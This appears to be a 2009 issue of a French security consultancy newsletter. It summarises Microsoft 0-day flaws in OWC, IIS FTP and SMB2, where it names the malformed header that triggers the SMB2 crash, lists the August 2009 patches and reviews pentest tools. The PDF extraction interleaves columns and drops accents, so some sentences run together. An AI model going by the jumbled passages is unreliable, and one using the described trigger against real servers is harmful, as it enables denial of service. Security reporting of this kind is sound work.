Pire encore, aprs avoir publis 9 correctifs, Microsoft v2.0.
prvoit une recrudescence d'exploits dans les 40 Cette vulnrabilit dcouverte dans Windows 7 et
prochains jours. Les vulnrabilits seraient trs simples Windows Vista est due une erreur lors du traitement
exploiter... Inquitant ! de requtes "NEGOCIATE PROTOCOL" par le pilote
"SRV2.SYS" dans le protocole SMB2.0, lorsque le
champs en-tte "Process Id High" contient un caractre
"&".
Les vulnrabilits 0-day : OWC, FTP et SMB
La requte "NEGOCIATE PROTOCOL" correspond la
2.0! premire requte SMB envoye par un client un
serveur SMB. Elle est utilise afin d'identifier le dialecte
Au cours de ces derniers mois, trois vulnrabilits 0-day SMB qui sera utilis. Un attaquant peut exploiter cette
ont t dcouvertes au sein de produits Microsoft. vulnrabilit par le biais d'en-ttes SMB malforms au
sein de la requte "NEGOCIATE PROTOCOL"
La premire provenait d'une erreur au sein du contrle
envoye, afin de provoquer un dni de service sur le
ActiveX Office Web Components Spreadsheet (OWC
serveur SMB.
10 et 11). En incitant un utilisateur visiter une page
web malicieuse avec un navigateur Internet acceptant
Kostya Korchinsky, chercheur de vulnrabilits et
les ActiveX (typiquement Internet Explorer), un
spcialiste de l'exploitation de vulnrabilits Windows
attaquant distant tait en mesure de corrompre la
prcise que l'excution de code distance pourrait
mmoire de sorte excuter un code malicieux.
tre possible mais resterait trs difficile... Un nouveau
Conficker en perspective ?
La seconde faille touche encore, l'heure o nous
rdigeons cet article, les serveurs et notamment le
service IIS/FTP. Cette dernire est lie un
dbordement de tampon lors du listing d'un nom de
rpertoire excessivement long.

Un attaquant pouvait exploiter cette vulnrabilit par le


biais de la commande FTP NLST (NAME LIST - elle
sert lister le contenu d'un rpertoire) et d'un rpertoire
spcialement conu pour compromettre le systme.
La pirate devait pour cela possder des droits d'criture
sur le serveur cibl.
WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [41]
ACTUALIT DU MOIS : 0 DAY ET ANTI-SEC L'ACTU SCU N23

Les correctifs d'aot 2009 [1] http://www.microsoft.com/technet/security/bulletin/


ms09-036.mspx
9 correctifs ont t publis au mois d'aot. Pendant que
certains discutaient avec le soleil, d'autres tentaient de [2] http://www.microsoft.com/technet/security/bulletin/
patcher au plus vite leurs machines, ...ou pas ! ms09-037.mspx
MS09-036 : une vulnrabilit au sein de
[3] http://www.microsoft.com/technet/security/bulletin/
framework .NET permettait de provoquer un dni de
ms09-038.mspx
service du serveur web IIS 7 [1].

MS09-037 : le moteur Active Template Library (ATL) [4] http://www.microsoft.com/technet/security/bulletin/


utilis par de nombreuses applications (Windos Media ms09-039.mspx
Player, Outlook Express...) pouvait tre exploit afin de
prendre le contrle d'un systme Windows [2]. [5] http://www.microsoft.com/technet/security/bulletin/
ms09-040.mspx
MS09-038 : la lecture d'un fichier .AVI malicieux
permettait de compromettre un systme vulnrable [3]. [6] http://www.microsoft.com/technet/security/bulletin/
ms09-041.mspx
MS09-039 : une vulnrabilit critique au sein du serveur
WINS permettait, via l'envoi de paquets malicieux, de [7] http://www.microsoft.com/technet/security/bulletin/
prendre le contrle d'un systme [4]. ms09-042.mspx

MS09-040 : une vulnrabilit identifie au sein du [8] http://www.microsoft.com/technet/security/bulletin/


service Message Queuing permettait un utilisateur ms09-043.mspx
d'obtenir les droits SYSTEM en exploitant un
dbordement de tampon [5]. [9] http://www.microsoft.com/technet/security/bulletin/
ms09-044.mspx
MS09-041 : une faille au sein du service Workstation
permettait un utilisateur local d'lever ses privilges
via des requtes RPC [6].

MS09-042 : un problme lors de la phase


d'authentification NTLM via le protocole Telnet lors
de connexions telnet permettait un pirate de rejouer
cette squence et s'authentifier sans connatre le mot
de passe de sa victime [7].

MS09-043 : Le composant Office Web pouvait tre


vulnrable lors de la visite d'une page web malicieuse
[8].

MS09-044 : le client RDP souffrait d'un dbordement


de tampon et pouvait tre exploit en incitant un client
vulnrable se connecter sur un serveur RDP
WWW.XMCOPARTNERS.COM

malicieux [9].

Rfrences :

Faille FTP/IIS (KB975191) :


http://www.microsoft.com/technet/security/advisory/
975191.mspx

Faille SMB (KB975497) :


http://www.microsoft.com/technet/security/advisory/
975497.mspx

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![42]
L'ACTU SCU N23

BLOGS, LOGICIELS ET Liste des blogs Scurit

EXTENSIONS SECURITE Chaque mois, nous vous prsentons,


dans cette rubrique, des outils
libres, des extensions Firefox ou
encore nos sites web prfrs.

Ce mois-ci, nous avons choisi de


vous prsenter un outil Windows,
le blog d'un chercheur/consultant
franais ainsi quune extension
Firefox utile pour les
pentesteurs.

XMCO | Partners

Au programme de ce mois :

Nicolas Ruff : chercheur chez EADS

PortQry : scanner de port Windows

UrlParams : visualisation des paramtres envoys lors de requtes GET et POST

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [43]
L'ACTU SCU N23

Nicolas Ruff
news0ft.blogspot.com
newsoft-tech.blogspot.com
Description Pour ceux qui s'intressent, ne serait-ce qu'un petit peu la scurit
informatique, il est inutile de prsenter Nicolas Ruff. Chercheur chez
EADS au sein de l'quipe de Cdric Blancher, Nicolas Ruff fait partie
des personnalits incontournables du monde de la scurit
franaise. Depuis quelques annes, il participe activement de
grands rendez-vous de la scurit (SSTIC, OSSIR, INfoSec,
EuroSec...).
Capture dcran

WWW.XMCOPARTNERS.COM

Adresse http://news0ft.blogspot.com
http://newsoft-tech.blogspot.com

Avis XMCO Nicolas Ruff tient jour deux blogs qui se compltent trs bien. Le
premier donne un point de vue sur l'actualit de la scurit avec un
ton propre son auteur. Le second est plus technique et orient
Pentest. Il fournit des astuces souvent trs recherches sur la
scurit Windows. Avis aux amateurs!

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [44]
L'ACTU SCU N23

Portqry
Scanner de port portable

Description Microsoft fait peu de publicit sur la multitude de logiciels


d'administration qu'il publie. Cependant, la plupart mriteraient
d'avantages de mdiatisation. L'outil PortQry en est le parfait
exemple. Disponible depuis 2003, ce dernier est un scanner de port
portable simple, rapide et efficace.

Capture dcran

Adresse La version 2.0 de PortQry est disponible ladresse suivante :


http://www.microsoft.com/downloads/details.aspx?
FamilyID=89811747-C74B-4638-A2D5-
AC828BDC6983&displaylang=en
WWW.XMCOPARTNERS.COM

Avis XMCO PortQry n'est pas un outil rvolutionnaire. D'autres scanneurs de


ports sont bien plus puissants et fiables mais risquent d'tre
dtects par les antivirus comme outils de hacking. Cet outil peut
cependant se rvler particulirement utile pour les tests d'intrusion,
car cet excutable ne ncessite aucune librairie particulire. De plus,
il est utilisable en ligne de commande. A tester !

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [45]
L'ACTU SCU N23

URLparams
Visualisation des paramtres HTTP envoys
Description Urlparams est une autre extension Firefox qui permet de visualiser
les paramtres des requtes HTTP (GET et POST) envoyes par
votre navigateur. Cette dernire se compose uniquement d'une
barre latrale qui contient l'ensemble des paramtres envoys. Il est
alors possible d'ajouter, de modifier et de supprimer sa guise le
nom et les valeurs de paramtres.

Capture dcran

Adresse Lextension est compatible avec toutes les version du navigateur


Firefox. Elle est disponible ladresse suivante :

http://urlparams.blogwart.com/share/index.php
WWW.XMCOPARTNERS.COM

Avis XMCO URLparams est une extension qui complte parfaitement la


panoplie relative aux tests d'applications web. Trs simple
d'utilisation, cette dernire vite de lancer des proxy locaux pour
l'excution de tests rapides.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [46]
L'ACTU SCU N23

propos de lActuScu

LActuScu est un magazine numrique rdig et dit par les consultants du cabinet de conseil Xmco Partners.
Elle a pour vocation de fournir des prsentations claires et dtailles sur les diffrents thmes de la scurit
informatique, et ce, en toute indpendance.

Tous les numros de lActuScu sont tlchargeables ladresse suivante:


http://www.xmcopartners.com/actualite-securite-vulnerabilite-fr.html

propos du cabinet Xmco Partners

Fond en 2002 par des experts en scurit, Xmco est dirig par ses fondateurs. Nous
n'intervenons que sous forme de projets forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit ou encore la veille de vulnrabilits
constituent les axes majeurs de dveloppement de notre cabinet.

Paralllement, nous intervenons auprs de grandes entreprises dans le cadre de


missions daccompagnement de RSSI, dlaboration de schma directeur ou
encore de sminaires de sensibilisation auprs de plusieurs grands comptes franais.

Contacter le cabinet Xmco Partners

Pour obtenir de plus amples informations sur notre mtier et notre cabinet, contactez-nous au 01 47 34 68 61.
Notre site web : http://www.xmcopartners.com/

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [47]
Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est
strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![48]